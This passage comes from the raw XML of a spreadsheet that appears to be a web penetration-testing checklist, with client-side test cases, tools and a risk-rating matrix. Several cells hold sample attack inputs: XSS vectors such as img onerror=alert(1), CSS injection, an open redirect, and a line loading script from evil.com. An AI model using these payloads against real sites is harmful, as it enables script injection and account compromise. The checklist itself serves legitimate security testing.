encoding, HTML encoding)?</t>
  </si>
  <si>
    <t xml:space="preserve">Client Side Testing</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-001</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for DOM based Cross Site Scripting</t>
  </si>
  <si>
    <t xml:space="preserve">Test for the user inputs obtained from client-side JavaScript Objects</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, DOMinator, jsprime, eslint</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-002</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for JavaScript Execution</t>
  </si>
  <si>
    <t xml:space="preserve">Inject JavaScript code:
www.victim.com/?javascript:alert(1)</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ZAP, eslint</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-003</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for HTML Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Send malicious HTML code:
?user=&lt;img%20src='aaa'%20onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-004</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Client Side URL Redirect</t>
  </si>
  <si>
    <t xml:space="preserve">Modify untrusted URL input to a malicious site: (Open Redirect)
?redirect=www.fake-target.site </t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-005</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for CSS Injection</t>
  </si>
  <si>
    <t xml:space="preserve">Inject code in the CSS context :
•  www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
•  www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-006</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Client Side Resource 
Manipulation</t>
  </si>
  <si>
    <t xml:space="preserve">External JavaScript could be easily injected in the trusted web site www.victim.com/#http://evil.com/js.js</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-007</t>
  </si>
  <si>
    <t xml:space="preserve">Test Cross Origin Resource Sharing</t>
  </si>
  <si>
    <t xml:space="preserve">Check the HTTP headers in order to understand how CORS is
used (Origin Header)</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-009</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for Clickjacking</t>
  </si>
  <si>
    <t xml:space="preserve">Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.</t>
  </si>
  <si>
    <t xml:space="preserve">Burp Proxy, ClickjackingTool</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-011</t>
  </si>
  <si>
    <t xml:space="preserve">Test Web Messaging</t>
  </si>
  <si>
    <t xml:space="preserve">Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains</t>
  </si>
  <si>
    <t xml:space="preserve">OTG-CLIENT-012</t>
  </si>
  <si>
    <t xml:space="preserve">Test Local Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Determine whether the website is storing sensitive data in the storage. XSS in localstorage 
http://server/StoragePOC.html#&lt;img src=x onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Chrome, Firebug, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-CLIENT-01</t>
  </si>
  <si>
    <t xml:space="preserve">Test for Known Vulnerabilities Client Side</t>
  </si>
  <si>
    <t xml:space="preserve">retire.js</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-CLIENT-02</t>
  </si>
  <si>
    <t xml:space="preserve">Testing of output encoding</t>
  </si>
  <si>
    <t xml:space="preserve">Has the correct encoding been applied to all data being output by the application</t>
  </si>
  <si>
    <t xml:space="preserve">CODE-CLIENT-03</t>
  </si>
  <si>
    <t xml:space="preserve">Testing for WSDL validity</t>
  </si>
  <si>
    <t xml:space="preserve">Web service endpoints address in Web Services Description Language (WSDL) is checked for validity</t>
  </si>
  <si>
    <t xml:space="preserve">Considerations</t>
  </si>
  <si>
    <t xml:space="preserve">Population Size</t>
  </si>
  <si>
    <t xml:space="preserve">Easy of Discovery</t>
  </si>
  <si>
    <t xml:space="preserve">Ease of Exploit</t>
  </si>
  <si>
    <t xml:space="preserve">Awareness</t>
  </si>
  <si>
    <t xml:space="preserve">Not Applicable </t>
  </si>
  <si>
    <t xml:space="preserve">Skills required</t>
  </si>
  <si>
    <t xml:space="preserve">Motive</t>
  </si>
  <si>
    <t xml:space="preserve">Opportunity</t>
  </si>
  <si>
    <t xml:space="preserve">System Administrators </t>
  </si>
  <si>
    <t xml:space="preserve">Practically impossible </t>
  </si>
  <si>
    <t xml:space="preserve">Theoretical </t>
  </si>
  <si>
    <t xml:space="preserve">Unknown </t>
  </si>
  <si>
    <t xml:space="preserve">Full access or expensive resources required </t>
  </si>
  <si>
    <t xml:space="preserve">Intranet Users </t>
  </si>
  <si>
    <t xml:space="preserve">Difficult </t>
  </si>
  <si>
    <t xml:space="preserve">Hidden </t>
  </si>
  <si>
    <t xml:space="preserve">Security penetration skills </t>
  </si>
  <si>
    <t xml:space="preserve">Low or no reward </t>
  </si>
  <si>
    <t xml:space="preserve">Special access or resources required </t>
  </si>
  <si>
    <t xml:space="preserve">Partners </t>
  </si>
  <si>
    <t xml:space="preserve">Easy </t>
  </si>
  <si>
    <t xml:space="preserve">Obvious </t>
  </si>
  <si>
    <t xml:space="preserve">Network and programmaing skills </t>
  </si>
  <si>
    <t xml:space="preserve">Possible reward </t>
  </si>
  <si>
    <t xml:space="preserve">Some access or resources required </t>
  </si>
  <si>
    <t xml:space="preserve">Authenticated users </t>
  </si>
  <si>
    <t xml:space="preserve">Automated tools available </t>
  </si>
  <si>
    <t xml:space="preserve">Public knowledge </t>
  </si>
  <si>
    <t xml:space="preserve">Advanced computer user </t>
  </si>
  <si>
    <t xml:space="preserve">High reward </t>
  </si>
  <si>
    <t xml:space="preserve">No access or resources required </t>
  </si>
  <si>
    <t xml:space="preserve">Anonymous Internet users </t>
  </si>
  <si>
    <t xml:space="preserve">Some technical skills </t>
  </si>
  <si>
    <t xml:space="preserve">no technical skills </t>
  </si>
  <si>
    <t xml:space="preserve">Loss of confidentiality</t>
  </si>
  <si>
    <t xml:space="preserve">Loss of Integrity</t>
  </si>
  <si>
    <t xml:space="preserve">Loss of Availability</t>
  </si>
  <si>
    <t xml:space="preserve">Minimal non-sensitive data disclosed </t>
  </si>
  <si>
    <t xml:space="preserve">Minimal slightly corrupt data </t>
  </si>
  <si>
    <t xml:space="preserve">Minimal secondary services interrupted </t>
  </si>
  <si>
    <t xml:space="preserve">Extensive non-sensitive data disclosed </t>
  </si>
  <si>
    <t xml:space="preserve">Minimal seriously corrupt data </t>
  </si>
  <si>
    <t xml:space="preserve">Minimal primary services interrupted </t>
  </si>
  <si>
    <t xml:space="preserve">Extensive critical data disclosed </t>
  </si>
  <si>
    <t xml:space="preserve">Extensive slightly corrupt data </t>
  </si>
  <si>
    <t xml:space="preserve">Extensive primary services interrupted </t>
  </si>
  <si>
    <t xml:space="preserve">All data disclosed </t>
  </si>
  <si>
    <t xml:space="preserve">Extensive seriously corrupt data </t>
  </si>
  <si>
    <t xml:space="preserve">All services completely lost </t>
  </si>
  <si>
    <t xml:space="preserve">All data totally corrupt </t>
  </si>
  <si>
    <t xml:space="preserve">Intrusion Detection</t>
  </si>
  <si>
    <t xml:space="preserve">Privacy violation</t>
  </si>
  <si>
    <t xml:space="preserve">Loss of Accountability</t>
  </si>
  <si>
    <t xml:space="preserve">Active detection in application </t>
  </si>
  <si>
    <t xml:space="preserve">One individual </t>
  </si>
  <si>
    <t xml:space="preserve">Attack fully traceable to individual </t>
  </si>
  <si>
    <t xml:space="preserve">Logged and reviewed </t>
  </si>
  <si>
    <t xml:space="preserve">Hundreds of people </t>
  </si>
  <si>
    <t xml:space="preserve">Attack possibly traceable to individual </t>
  </si>
  <si>
    <t xml:space="preserve">Logged without review </t>
  </si>
  <si>
    <t xml:space="preserve">Thousands of people </t>
  </si>
  <si>
    <t xml:space="preserve">Attack completely anonymous </t>
  </si>
  <si>
    <t xml:space="preserve">Not logged </t>
  </si>
  <si>
    <t xml:space="preserve">Millions of people </t>
  </si>
  <si>
    <t xml:space="preserve">Financial damage</t>
  </si>
  <si>
    <t xml:space="preserve">Reputation damage</t>
  </si>
  <si>
    <t xml:space="preserve">Non-Compliance</t>
  </si>
  <si>
    <t xml:space="preserve">Damage costs less than to fix the issue </t>
  </si>
  <si>
    <t xml:space="preserve">Minimal damage </t>
  </si>
  <si>
    <t xml:space="preserve">Minor violation </t>
  </si>
  <si>
    <t xml:space="preserve">Minor effect on annual profit </t>
  </si>
  <si>
    <t xml:space="preserve">Loss of major accounts </t>
  </si>
  <si>
    <t xml:space="preserve">Clear violation </t>
  </si>
  <si>
    <t xml:space="preserve">Significant effect on annual profit </t>
  </si>
  <si>
    <t xml:space="preserve">Loss of goodwill </t>
  </si>
  <si>
    <t xml:space="preserve">High profile violation </t>
  </si>
  <si>
    <t xml:space="preserve">Backruptcy </t>
  </si>
  <si>
    <t xml:space="preserve">Brand damage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</si>
</sst>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9"/>
      <color rgb="FF80808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80808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5:E14" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A5:E14"/>
  <tableColumns count="5">
    <tableColumn id="1" name="Information Gathering"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Done"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table10.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="10" name="Table616" displayName="Table616" ref="A112:E122" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A112:E122"/>
  <tableColumns count="5">
    <tableColumn id="1" name="Client Side Testing"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Result"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table11.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="11" name="Table9" displayName="Table9" ref="A51:E62" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A51:E62"/>
  <tableColumns count="5">
    <tableColumn id="1" name="Data Validation Testing"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Done"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table2.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="2" name="Table2" displayName="Table2" ref="A16:E22" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A16:E22"/>
  <tableColumns count="5">
    <tableColumn id="1" name="Configuration and Deploy Management Testing"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Done"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table3.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="3" name="Table29" displayName="Table29" ref="A25:E31" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A25:E31"/>
  <tableColumns count="5">
    <tableColumn id="1" name="Identity Management Testing"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Done"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table4.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="4" name="Table3" displayName="Table3" ref="A33:E41" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A33:E41"/>
  <tableColumns count="5">
    <tableColumn id="1" name="Authentication Testing"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Done"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table5.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="5" name="Table4" displayName="Table4" ref="A50:E50" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A50:E50"/>
  <tableColumns count="5">
    <tableColumn id="1" name=""/>
    <tableColumn id="2" name=""/>
    <tableColumn id="3" name=""/>
    <tableColumn id="4" name=""/>
    <tableColumn id="5" name=""/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table6.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="6" name="Table5" displayName="Table5" ref="A43:E47" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A43:E47"/>
  <tableColumns count="5">
    <tableColumn id="1" name="Authorization Testing "/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Done"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table7.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="7" name="Table6" displayName="Table6" ref="A95:E104" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A95:E104"/>
  <tableColumns count="5">
    <tableColumn id="1" name="Business logic Testing"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Done"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table8.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="8" name="Table614" displayName="Table614" ref="A76:E78" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A76:E78"/>
  <tableColumns count="5">
    <tableColumn id="1" name="Error Handling"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Done"/>
  </tableColumns>
</table>
</file>

<file path=xl/tables/table9.xml><?xml version="1.0" encoding="utf-8"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="9" name="Table61415" displayName="Table61415" ref="A80:E82" headerRowCount="1" totalsRowCount="0" totalsRowShown="0">
  <autoFilter ref="A80:E82"/>
  <tableColumns count="5">
    <tableColumn id="1" name="Cryptography"/>
    <tableColumn id="2" name="Test Name"/>
    <tableColumn id="3" name="Description"/>
    <tableColumn id="4" name="Tools"/>
    <tableColumn id="5" name="Do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5"/>
  <sheetViews>
    <sheetView windowProtection="false" showFormulas="false" showGridLines="fals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D114" activeCellId="0" sqref="D114"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="12.8"/>
  <cols>
    <col collapsed="false" hidden="false" max="1" min="1" style="1" width="15.9285714285714"/>
    <col collapsed="false" hidden="false" max="2" min="2" style="1" width="34.0204081632653"/>
    <col collapsed="false" hidden="false" max="3" min="3" style="2" width="45.8979591836735"/>
    <col collapsed="false" hidden="false" max="4" min="4" style="1" width="19.7091836734694"/>
    <col collapsed="false" hidden="false" max="5" min="5" style="0" width="9.71938775510204"/>
  </cols>
  <sheetData>
    <row r="1" customFormat="false" ht="17.35" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A1" s="3" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="3"/>
      <c r="C1" s="0"/>
      <c r="D1" s="0"/>
    </row>
    <row r="2" customFormat="false" ht="12.8" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A2" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B2" s="4"/>
      <c r="C2" s="0"/>
      <c r="D2" s="0"/>
    </row>
    <row r="3" customFormat="false" ht="12.8" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A3" s="5" t="s">
        <v>2</v>
      </c>
      <c r="B3" s="4" t="s">
        <v>3</v>
      </c>
      <c r="C3" s="4"/>
      <c r="D3" s="6"/>
    </row>
    <row r="4" customFormat="false" ht="12.8" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A4" s="5"/>
      <c r="B4" s="4" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="4"/>
      <c r="D4" s="6"/>
    </row>
    <row r="5" s="9" customFormat="true" ht="31.45" hidden="false" customHeight="true" outlineLevel="0" collapsed="false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AMJ5" s="0"/>
    </row>
    <row r="6" customFormat="false" ht="49.45" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A6" s="9" t="s">
        <v>10</v>
      </c>
      <c r="B6" s="6" t="s">
        <v>11</v>
      </c>
      <c r="C6" s="10" t="s">
        <v>12</v>
      </c>
      <c r="D6" s="11" t="s">
        <v>13</v>
      </c>
      <c r="E6" s="12"/>
    </row>
    <row r="7" customFormat="false" ht="23.85" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A7" s="9" t="s">
        <v>14</v>
      </c>
      <c r="B7" s="6" t="s">
        <v>15</v>
      </c>
      <c r="C7" s="10" t="s">
        <v>16</v>
      </c>
      <c r="D7" s="11" t="s">
        <v>17</v>
      </c>
      <c r="E7" s="12"/>
    </row>
    <row r="8" customFormat="false" ht="38.95" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A8" s="9" t="s">
        <v>18</v>
      </c>
      <c r="B8" s="6" t="s">
        <v>19</v>
      </c>
      <c r="C8" s="10" t="s">
        <v>20</v>
      </c>
      <c r="D8" s="11" t="s">
        <v>21</v>
      </c>
      <c r="E8" s="12"/>
    </row>
    <row r="9" customFormat="false" ht="23.85" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A9" s="9" t="s">
        <v>22</v>
      </c>
      <c r="B9" s="6" t="s">
        <v>23</v>
      </c>
      <c r="C9" s="10" t="s">
        <v>24</v>
      </c>
      <c r="D9" s="11" t="s">
        <v>17</v>
      </c>
      <c r="E9" s="12"/>
    </row>
    <row r="10" customFormat="false" ht="23.85" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A10" s="9" t="s">
        <v>25</v>
      </c>
      <c r="B10" s="6" t="s">
        <v>26</v>
      </c>
      <c r="C10" s="10" t="s">
        <v>27</v>
      </c>
      <c r="D10" s="11" t="s">
        <v>28</v>
      </c>
      <c r="E10" s="12"/>
    </row>
    <row r="11" customFormat="false" ht="21.7" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A11" s="9" t="s">
        <v>29</v>
      </c>
      <c r="B11" s="6" t="s">
        <v>30</v>
      </c>
      <c r="C11" s="13" t="s">
        <v>31</v>
      </c>
      <c r="D11" s="11" t="s">
        <v>32</v>
      </c>
      <c r="E11" s="12"/>
    </row>
    <row r="12" s="9" customFormat="true" ht="23.85" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A12" s="9" t="s">
        <v>33</v>
      </c>
      <c r="B12" s="6" t="s">
        <v>34</v>
      </c>
      <c r="C12" s="10" t="s">
        <v>35</v>
      </c>
      <c r="D12" s="11" t="s">
        <v>36</v>
      </c>
      <c r="E12" s="12"/>
      <c r="AMJ12" s="0"/>
    </row>
    <row r="13" customFormat="false" ht="35.2" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A13" s="9" t="s">
        <v>37</v>
      </c>
      <c r="B13" s="6" t="s">
        <v>38</v>
      </c>
      <c r="C13" s="10" t="s">
        <v>39</v>
      </c>
      <c r="D13" s="11" t="s">
        <v>40</v>
      </c>
      <c r="E13" s="12"/>
    </row>
    <row r="14" customFormat="false" ht="22.35" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A14" s="9" t="s">
        <v>41</v>
      </c>
      <c r="B14" s="6" t="s">
        <v>42</v>
      </c>
      <c r="C14" s="10" t="s">
        <v>43</v>
      </c>
      <c r="D14" s="11" t="s">
        <v>17</v>
      </c>
      <c r="E14" s="12"/>
    </row>
    <row r="15" customFormat="false" ht="59.95" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A15" s="9"/>
      <c r="B15" s="6"/>
      <c r="C15" s="10"/>
      <c r="D15" s="11"/>
      <c r="E15" s="14"/>
    </row>
    <row r="16" customFormat="false" ht="44.95" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A16" s="7" t="s">
        <v>44</v>
      </c>
      <c r="B16" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C16" s="8" t="s">
        <v>7</v>
      </c>
      <c r="D16" s="8" t="s">
        <v>8</v>
      </c>
      <c r="E16" s="8" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="17" customFormat="false" ht="32.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A17" s="9" t="s">
        <v>45</v>
      </c>
      <c r="B17" s="6" t="s">
        <v>46</v>
      </c>
      <c r="C17" s="10" t="s">
        <v>47</v>
      </c>
      <c r="D17" s="11" t="s">
        <v>48</v>
      </c>
      <c r="E17" s="12"/>
    </row>
    <row r="18" customFormat="false" ht="22.35" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A18" s="9" t="s">
        <v>49</v>
      </c>
      <c r="B18" s="6" t="s">
        <v>50</v>
      </c>
      <c r="C18" s="10" t="s">
        <v>51</v>
      </c>
      <c r="D18" s="11" t="s">
        <v>52</v>
      </c>
      <c r="E18" s="12"/>
    </row>
    <row r="19" customFormat="false" ht="24.7" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A19" s="9" t="s">
        <v>53</v>
      </c>
      <c r="B19" s="6" t="s">
        <v>54</v>
      </c>
      <c r="C19" s="10" t="s">
        <v>55</v>
      </c>
      <c r="D19" s="11" t="s">
        <v>52</v>
      </c>
      <c r="E19" s="12"/>
    </row>
    <row r="20" customFormat="false" ht="23.85" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A20" s="9" t="s">
        <v>56</v>
      </c>
      <c r="B20" s="6" t="s">
        <v>57</v>
      </c>
      <c r="C20" s="10" t="s">
        <v>58</v>
      </c>
      <c r="D20" s="11" t="s">
        <v>59</v>
      </c>
      <c r="E20" s="12"/>
    </row>
    <row r="21" customFormat="false" ht="32.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A21" s="9" t="s">
        <v>60</v>
      </c>
      <c r="B21" s="6" t="s">
        <v>61</v>
      </c>
      <c r="C21" s="10" t="s">
        <v>62</v>
      </c>
      <c r="D21" s="11" t="s">
        <v>63</v>
      </c>
      <c r="E21" s="12"/>
    </row>
    <row r="22" customFormat="false" ht="22.35" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A22" s="9" t="s">
        <v>64</v>
      </c>
      <c r="B22" s="6" t="s">
        <v>65</v>
      </c>
      <c r="C22" s="10" t="s">
        <v>66</v>
      </c>
      <c r="D22" s="11" t="s">
        <v>67</v>
      </c>
      <c r="E22" s="12"/>
    </row>
    <row r="23" customFormat="false" ht="22.45" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A23" s="9" t="s">
        <v>68</v>
      </c>
      <c r="B23" s="15" t="s">
        <v>69</v>
      </c>
      <c r="C23" s="10" t="s">
        <v>70</v>
      </c>
      <c r="D23" s="11" t="s">
        <v>71</v>
      </c>
      <c r="E23" s="14"/>
    </row>
    <row r="24" customFormat="false" ht="215.95" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A24" s="9"/>
      <c r="B24" s="0"/>
      <c r="C24" s="10"/>
      <c r="D24" s="11"/>
      <c r="E24" s="14"/>
    </row>
    <row r="25" customFormat="false" ht="38.95" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A25" s="7" t="s">
        <v>72</v>
      </c>
      <c r="B25" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C25" s="8" t="s">
        <v>7</v>
      </c>
      <c r="D25" s="8" t="s">
        <v>8</v>
      </c>
      <c r="E25" s="8" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="26" customFormat="false" ht="22.35" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A26" s="9" t="s">
        <v>73</v>
      </c>
      <c r="B26" s="6" t="s">
        <v>74</v>
      </c>
      <c r="C26" s="10" t="s">
        <v>75</v>
      </c>
      <c r="D26" s="11" t="s">
        <v>76</v>
      </c>
      <c r="E26" s="12"/>
    </row>
    <row r="27" customFormat="false" ht="33.7" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A27" s="9" t="s">
        <v>77</v>
      </c>
      <c r="B27" s="6" t="s">
        <v>78</v>
      </c>
      <c r="C27" s="10" t="s">
        <v>79</v>
      </c>
      <c r="D27" s="11" t="s">
        <v>76</v>
      </c>
      <c r="E27" s="12"/>
    </row>
    <row r="28" customFormat="false" ht="32.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A28" s="9" t="s">
        <v>80</v>
      </c>
      <c r="B28" s="6" t="s">
        <v>81</v>
      </c>
      <c r="C28" s="10" t="s">
        <v>82</v>
      </c>
      <c r="D28" s="11" t="s">
        <v>83</v>
      </c>
      <c r="E28" s="12"/>
    </row>
    <row r="29" customFormat="false" ht="38.2" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A29" s="9" t="s">
        <v>84</v>
      </c>
      <c r="B29" s="6" t="s">
        <v>85</v>
      </c>
      <c r="C29" s="10" t="s">
        <v>86</v>
      </c>
      <c r="D29" s="11" t="s">
        <v>83</v>
      </c>
      <c r="E29" s="12"/>
    </row>
    <row r="30" customFormat="false" ht="61.45" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A30" s="9" t="s">
        <v>87</v>
      </c>
      <c r="B30" s="6" t="s">
        <v>88</v>
      </c>
      <c r="C30" s="10" t="s">
        <v>89</v>
      </c>
      <c r="D30" s="11" t="s">
        <v>76</v>
      </c>
      <c r="E30" s="12"/>
    </row>
    <row r="31" customFormat="false" ht="36.7" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A31" s="9" t="s">
        <v>90</v>
      </c>
      <c r="B31" s="6" t="s">
        <v>91</v>
      </c>
      <c r="C31" s="10" t="s">
        <v>92</v>
      </c>
      <c r="D31" s="11" t="s">
        <v>76</v>
      </c>
      <c r="E31" s="12"/>
    </row>
    <row r="32" customFormat="false" ht="158.95" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A32" s="9"/>
      <c r="B32" s="0"/>
      <c r="C32" s="10"/>
      <c r="D32" s="11"/>
      <c r="E32" s="14"/>
    </row>
    <row r="33" s="9" customFormat="true" ht="42.7" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A33" s="7" t="s">
        <v>93</v>
      </c>
      <c r="B33" s="8" t="s">
        <v>6</v>
      </c>
      <c r="C33" s="8" t="s">
        <v>7</v>
      </c>
      <c r="D33" s="8" t="s">
        <v>8</v>
      </c>
      <c r="E33" s="8" t="s">
        <v>9</v>
      </c>
      <c r="AMJ33" s="0"/>
    </row>
    <row r="34" customFormat="false" ht="23.85" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A34" s="9" t="s">
        <v>94</v>
      </c>
      <c r="B34" s="6" t="s">
        <v>95</v>
      </c>
      <c r="C34" s="10" t="s">
        <v>96</v>
      </c>
      <c r="D34" s="11" t="s">
        <v>76</v>
      </c>
      <c r="E34" s="12"/>
    </row>
    <row r="35" customFormat="false" ht="22.35" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A35" s="9" t="s">
        <v>97</v>
      </c>
      <c r="B35" s="6" t="s">
        <v>98</v>
      </c>
      <c r="C35" s="10" t="s">
        <v>99</v>
      </c>
      <c r="D35" s="11" t="s">
        <v>100</v>
      </c>
      <c r="E35" s="12"/>
    </row>
    <row r="36" customFormat="false" ht="32.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A36" s="9" t="s">
        <v>101</v>
      </c>
      <c r="B36" s="6" t="s">
        <v>102</v>
      </c>
      <c r="C36" s="10" t="s">
        <v>103</v>
      </c>
      <c r="D36" s="11" t="s">
        <v>104</v>
      </c>
      <c r="E36" s="12"/>
    </row>
    <row r="37" customFormat="false" ht="36.7" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A37" s="9" t="s">
        <v>105</v>
      </c>
      <c r="B37" s="6" t="s">
        <v>106</v>
      </c>
      <c r="C37" s="10" t="s">
        <v>107</v>
      </c>
      <c r="D37" s="11" t="s">
        <v>76</v>
      </c>
      <c r="E37" s="12"/>
    </row>
    <row r="38" customFormat="false" ht="32.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A38" s="9" t="s">
        <v>108</v>
      </c>
      <c r="B38" s="6" t="s">
        <v>109</v>
      </c>
      <c r="C38" s="10" t="s">
        <v>110</v>
      </c>
      <c r="D38" s="11" t="s">
        <v>76</v>
      </c>
      <c r="E38" s="12"/>
    </row>
    <row r="39" customFormat="false" ht="32.8" hidden="false" customHeight="false" outlineLevel="0" collapsed="false">
      <c r="A39" s="9" t="s">
        <v>111</v>
      </c>
